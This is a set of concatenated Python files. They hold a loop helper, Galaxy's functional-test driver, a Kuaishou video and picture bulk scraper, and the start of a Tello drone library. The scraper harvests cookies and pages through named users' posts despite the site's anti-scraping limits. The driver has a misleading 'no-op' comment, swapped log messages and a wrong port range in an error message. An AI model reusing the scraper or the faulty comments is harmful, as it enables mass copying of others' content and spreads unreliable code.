def loops(self) -> List[Loop]:
return self._loops
def append(self, loop: Loop) -> None:
self.loops.append(loop)
def extend(self, loops: Union[LoopList, Sequence[Loop]]) -> None:
if isinstance(loops, LoopList):
self.loops.extend(loops.loops)
else:
self.loops.extend(loops)
def start(self) -> None:
for loop in self.loops:
loop.start()
def join(self) -> None:
for loop in self.loops:
loop.join()
def terminate(self) -> None:
for loop in self.loops:
loop.terminate()
LoopLike = Union[Loop, LoopList]
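# --- Hedged usage sketch (comments only; the factories and phase names below
# are assumptions for illustration, not part of this module) ------------------
#
#   train_loop = ParallelLoop(env_factory, agent_factory, controller,
#                             Phase.TRAIN, should_update=True, num_rollouts=8)
#   eval_loop = ParallelLoop(env_factory, agent_factory, controller,
#                            Phase.EVAL, num_rollouts=2)
#   loops = LoopList([train_loop, eval_loop])
#   loops.start()   # fans out to every loop's worker processes
#   loops.join()    # or loops.terminate() to stop them early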
|
driver_util.py
|
"""Scripts for drivers of Galaxy functional tests."""
import collections
import fcntl
import httplib
import json
import logging
import os
import random
import shutil
import socket
import struct
import sys
import tempfile
import threading
import time
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
from paste import httpserver
from functional import database_contexts
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.util import asbool, download_to_file
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy.webapps.tool_shed.app import UniverseApplication as ToolshedUniverseApplication
from .api_util import get_master_api_key, get_user_api_key
from .instrument import StructuredTestDataPlugin
from .nose_util import run
from .test_logging import logging_config_file
from .tool_shed_util import parse_tool_panel_config
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
DEFAULT_WEB_HOST = "localhost"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(GALAXY_TEST_DIRECTORY, "shed_functional", "test_data")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = tempfile.mkdtemp()
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
    # the full path to the temporary directory where the repositories are located cannot contain invalid URL characters.
os.environ[ 'TOOL_SHED_TEST_TMP_DIR' ] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
    # no-op; remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
):
"""Setup environment and build config for test Galaxy instance."""
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
file_path = os.path.join(tmpdir, 'files')
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir )
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR', None)
if tool_dependency_dir is None:
tool_dependency_dir = tempfile.mkdtemp(dir=tmpdir, prefix="tool_dependencies")
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml' ]:
if os.path.exists( data_manager_config ):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
master_api_key = get_master_api_key()
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = "%s,%s" % (tool_conf, shed_tool_conf)
shed_tool_data_table_config = default_shed_tool_data_table_config
if shed_tool_data_table_config is None:
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
cleanup_job='onsuccess',
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
file_path=file_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
master_api_key=master_api_key,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_conf,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
)
config.update(database_conf(tmpdir))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff - todo read from
# Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir
return config
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
        # ... otherwise find whatever Galaxy would use as the default and
        # add the sample data for functional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml' ]:
if os.path.exists( tool_data_config ):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
return tool_data_table_config_path
def nose_config_and_run( argv=None, env=None, ignore_files=[], plugins=None ):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin( StructuredTestDataPlugin() )
test_config.configure( argv )
result = run( test_config )
success = result.wasSuccessful()
return success
def copy_database_template( source, db_path ):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
download_to_file(source, db_path)
else:
raise Exception( "Failed to copy database template from source %s" % source )
def database_conf(db_path, prefix="GALAXY"):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
dburi_var = "%s_TEST_DBURI" % prefix
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
return config
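# Hedged worked example (comments only): with no GALAXY_TEST_DBURI set,
#     database_conf("/tmp/dbs")
# yields {"database_connection": "sqlite:////tmp/dbs/galaxy.sqlite",
#         "database_auto_migrate": False}; exporting GALAXY_TEST_DBURI to a
# non-sqlite URI makes that URI win and adds the pool-size/max-overflow options.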
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'june_2007_style', 'blue'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update( _get_static_settings() )
return global_conf
def wait_for_http_server(host, port):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for i in range( 10 ):
# directly test the app, not the proxy
conn = httplib.HTTPConnection(host, port)
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running one.
"""
server = None
if port is not None:
server = httpserver.serve( webapp, host=host, port=port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
port = str( random.randint( 8000, 10000 ) )
server = httpserver.serve( webapp, host=host, port=port, start_loop=False )
break
except socket.error as e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( 8000, 1000 ) )
t = threading.Thread( target=server.serve_forever )
t.start()
return server, port
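# --- Hedged sketch (not part of the original driver; helper name is ours) ----
# An alternative to retrying random ports above is to let the OS pick a free
# one by binding to port 0 and reading the assigned port back.
def _find_free_port(host="127.0.0.1"):
    """Return a TCP port that was free at the time of the call."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind((host, 0))
        return s.getsockname()[1]
    finally:
        s.close()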
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info( "GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir )
return
try:
        if os.path.exists(tempdir):
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = os.path.join(tmpdir, 'shed_tools_dict')
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config(MIGRATED_TOOL_PANEL_CONFIG, shed_tools_dict)
elif testing_installed_tools:
for shed_tool_config in INSTALLED_TOOL_PANEL_CONFIGS:
has_test_data, shed_tools_dict = parse_tool_panel_config(shed_tool_config, shed_tools_dict)
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
with open(galaxy_tool_shed_test_file, 'w') as shed_tools_file:
shed_tools_file.write(json.dumps(shed_tools_dict))
if not os.path.isabs(galaxy_tool_shed_test_file):
galaxy_tool_shed_test_file = os.path.join(galaxy_root, galaxy_tool_shed_test_file)
os.environ['GALAXY_TOOL_SHED_TEST_FILE'] = galaxy_tool_shed_test_file
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "config/galaxy.ini.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication( **simple_kwargs )
log.info( "Embedded Galaxy application started" )
database_contexts.galaxy_context = app.model.context
database_contexts.install_context = app.install_model.context
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.ini.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication( **simple_kwargs )
database_contexts.tool_shed_context = app.model.context
log.info( "Embedded Toolshed application started" )
return app
ServerWrapper = collections.namedtuple('ServerWrapper', ['app', 'server', 'name', 'host', 'port'])
def _stop(self):
if self.server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self.server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self.app is not None:
log.info("Stopping application %s" % self.name)
self.app.shutdown()
log.info("Application %s stopped." % self.name)
ServerWrapper.stop = _stop
class classproperty(object):
def __init__(self, f):
self.f = f
def __get__(self, obj, owner):
return self.f(owner)
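# Hedged usage sketch (the example class below is ours, for illustration only):
# classproperty lets an attribute be computed from the class itself.
class _ClasspropertyExample(object):
    @classproperty
    def label(cls):
        return "driver:" + cls.__name__
# _ClasspropertyExample.label == "driver:_ClasspropertyExample"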
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
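# Hedged usage note (comments only): get_ip_address uses the Linux-only
# SIOCGIFADDR ioctl, so it expects a real interface name, e.g.
#     get_ip_address('eth0')  ->  the IPv4 address bound to eth0
# and will raise an error on other platforms or for unknown interfaces.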
def launch_server(app, webapp_factory, kwargs, prefix="GALAXY", config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
port = os.environ.get(port_env_key, None)
webapp = webapp_factory(
kwargs[ 'global_conf' ],
app=app,
use_translogger=False,
static_enabled=True
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port)
log.info("Embedded web server for %s started" % name)
return ServerWrapper(
app, server, name, host, port
)
class TestDriver(object):
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info( "Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
if config_object is None:
config_object = self
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
if self.external_galaxy is None:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
            # one - otherwise just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if hasattr(galaxy_config, '__call__'):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=default_tool_conf,
datatypes_conf=datatypes_conf_override,
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
handle_galaxy_config_kwds = getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
self.server_wrappers.append(server_wrapper)
log.info("Functional tests will be run against external Galaxy server %s:%s" % (server_wrapper.host, server_wrapper.port))
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0):
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
tool = self.app.toolbox.get_tool(tool_id)
testdef = tool.tests[index]
test_case_cls = functional.test_toolbox.ToolTestCase
test_case = test_case_cls(methodName="setUp") # NO-OP
test_case.shed_tool_id = None
test_case.master_api_key = get_master_api_key()
test_case.user_api_key = get_user_api_key()
test_case.setUp()
test_case.do_it(testdef)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
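# Hedged usage sketch (comment only; every name referenced is defined above in this
# module): a functional-test entry point would normally subclass GalaxyTestDriver and
# pass the class to drive_test(), which instantiates the driver, configures the
# environment, builds the nose tests, runs them, tears everything down and exits with
# the result code.
#
#   if __name__ == "__main__":
#       drive_test(GalaxyTestDriver)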
|
kuaishou_new.py
|
# -*-coding:utf-8 -*-
import requests
import time
import os
import json
import threading
import re
cookies = ""
def downVideo(video,d_url,v_name):
if not os.path.exists(video):
r = requests.get(d_url)
r.raise_for_status()
with open(video, "wb") as f:
f.write(r.content)
print(" 视频 " + v_name + " 下载成功 √")
# else:
# print(" 视频 " + v_name + " 已存在 √")
def downPic(j,pic,d_url,p_name):
if not os.path.exists(pic):
r = requests.get(d_url)
r.raise_for_status()
with open(pic, "wb") as f:
f.write(r.content)
print(" " + str(j + 1) + "/ 图片 " + p_name + " 下载成功 √")
# else:
# print(" " + str(j + 1) + "/ 图片 " + p_name + " 已存在 √")
def getCookies():
# url = 'https://c.m.chenzhongtech.com/rest/lapi/getcoo?_='+str(int(round(time.time() * 1000)))
url = 'https://live.kuaishou.com/u/3xnvh7hzw7ib9ec/3xqbgg5rrpui69c'
headers_web = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
'Connection': 'keep-alive',
'Host': 'live.kuaishou.com',
# 'Origin': 'https://v.kuaishou.com',
# 'Referer': 'https://v.kuaishou.com/fw/photo/3xqbgg5rrpui69c',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36',
# 'Cookie':'did=web_c78c7a3f39befb6076e5891268254f0f'
}
rs = requests.get(url=url, headers=headers_web, allow_redirects=False)
# resJson = json.loads(rs.content.decode(encoding='utf-8'))
global cookies
# cookies = resJson['cookies'][0].split(';')[0]
cookies = 'did='+rs.cookies._cookies['.kuaishou.com']['/']['did'].value
def getVideo(data):
url = 'https://v.kuaishou.com/rest/kd/feed/profile'
headers_web = {
'accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
'Connection': 'keep-alive',
'Content-Type': 'application/json',
'Host': 'v.kuaishou.com',
'Origin': 'https://v.kuaishou.com',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36',
        # Cookie: adjust this for your own machine
#'Cookie': 'did=web_6ab2aa48ebfa49c18e497b1efb80429f'
}
headers_web["Cookie"] = cookies
rs = requests.post(url=url, headers=headers_web, json=data)
v_json = json.loads(rs.content.decode(encoding='utf-8'))
if (str(v_json["result"])=="2"):
print("服务器返回操作太快,可能触发反爬机制")
return
feeds = v_json["feeds"]
for i in range(len(feeds)):
feed = feeds[i]
caption = str(feed["caption"]).replace("\n","").replace("\u200b","").replace("\"","").replace("\\","")[0:100]
f_time = time.strftime('%Y-%m-%d %H%M%S', time.localtime(feed['timestamp'] / 1000))
name = re.sub(r'[\\/:*?"<>|\r\n]+', "", feed['userName'])
dir = "data/" + name + "(" + feed['userEid'] + ")/"
if not os.path.exists(dir):
os.makedirs(dir)
if(str(feed['singlePicture']) == "False"):
d_url = feed['mainMvUrls'][0]['url']
v_name = f_time + "_" + caption + ".mp4"
video = dir + v_name
t_downVideo = threading.Thread(target=downVideo, args=(video,d_url,v_name,))
t_downVideo.start()
else:
try:
imgList = feed['ext_params']['atlas']['list']
cdn = feed['ext_params']['atlas']['cdn'][0]
            except (KeyError, IndexError, TypeError):
imgList = []
imgList.append(str(feed['coverUrls'][0]['url']).replace("https://",""))
cdn = ""
for j in range(len(imgList)):
p_name = f_time + "_" + caption + "_" + str(j + 1) + ".jpg"
pic = dir + p_name
d_url = "https://" + cdn + imgList[j].replace("webp","jpg")
t_downPic = threading.Thread(target=downPic, args=(j,pic,d_url,p_name,))
t_downPic.start()
pcursor = v_json["pcursor"]
if(str(pcursor) != "no_more"):
data = {"eid":v_json['feeds'][0]['userEid'],"count":30,"pcursor":pcursor}
getVideo(data)
if not os.path.exists("/data"):
os.makedirs("/data")
getCookies()
eidList = ["3xnvh7hzw7ib9ec","3xi4m53fqfftq94"]
for eid in eidList:
data = {"eid":eid,"count":30,"pcursor":"0"}
getVideo(data)
print("收工")
|
tello.py
|
"""Library for interacting with DJI Ryze Tello drones.
"""
# coding=utf-8
import logging
import socket
import time
from threading import Thread
from typing import Optional, Union, Type, Dict
from .enforce_types import enforce_types
import av
import numpy as np
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
class TelloException(Exception):
pass
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
